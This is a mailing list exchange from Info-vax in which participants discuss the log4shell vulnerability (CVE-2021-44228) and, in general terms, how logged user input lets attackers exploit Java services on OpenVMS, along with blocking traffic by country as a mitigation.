[Info-vax] Java, log4j, log4shell, and OpenVMS: CVE-2021-44228

David Turner dturner at islandco.com
Wed Dec 15 12:51:26 EST 2021 

I wonder if there is anything that can be done in the .htaccess file

I have most countries outside of our business realm blocked so they 
cannot even connect to the website
Since these attempts are typically made by a few malicious players in a 
few countries, blocking access via country and ip has really helped us








On 12/15/2021 10:22 AM, Arne Vajhøj wrote:
> On 12/14/2021 10:06 PM, David Turner wrote:
>> So the vulnerability is there. How would one take advantage of it 
>> anyway?
>> Wouldn't you need a privileged account to even get into the server to 
>> start taking advantage of the flaws?
>> Assuming one is pretty careful about access to the network, and the 
>> directory permissions are controlled, wouldn't it be hard to get to 
>> do any damage?
>>
>> Curious as I cannot find much information outside of the warning. I 
>> guess no one wants to give hackers the keys to the rolls....
>
> The vulnerability is in the processing of log messages in
> a logging framework.
>
> To exploit the attackers need to get a specific message
> logged.
>
> And that is usually pretty easy. The primary purpose of logging
> is to help troubleshooting problems and to do that it makes sense
> to log user input.
>
> It does not matter how the user input comes into the system.
>
> The two most common ways are probably:
> * web service calls coming in from the internet
> * web form post coming in from internet
>
> But it could also be an insider instead of internet.
>
> And it could be plain socket or a message queue or a file
> instead of HTTP(S).
>
> Because the problem is in the data content, then traditional
> isolation often doesn't help.
>




> --firewall--Java web service with log4j
>
> --firewall--Apache httpd proxy--firewall--Java web service with log4j
>
> --firewall--Apache httdd proxy--firewall--PHP web service--message 
> queue--Java backend with log4j
>
> --firewall--Apache httdd proxy--firewall--PHP web 
> service--database--Python job--message queue--Java backend with log4j
>
> does not make a difference if that Java code calls log4j with
> user input with malicious content then bad things can happen.
>
> To move on with the exploit the Java code need to be able to
> reach a server controlled by the attacker, but many places
> only have strict control of inbound traffic not outbound traffic.
>
> And the Java code need to have access to something. But if the
> code is intended to do something on behalf of the user then it
> obviously need to have access to user data. That it may not have
> access to modify OS does not stop bad things from happening.
>
> Arne
>
>
>
>
>
>
>
>
>
>

More information about the Info-vax mailing list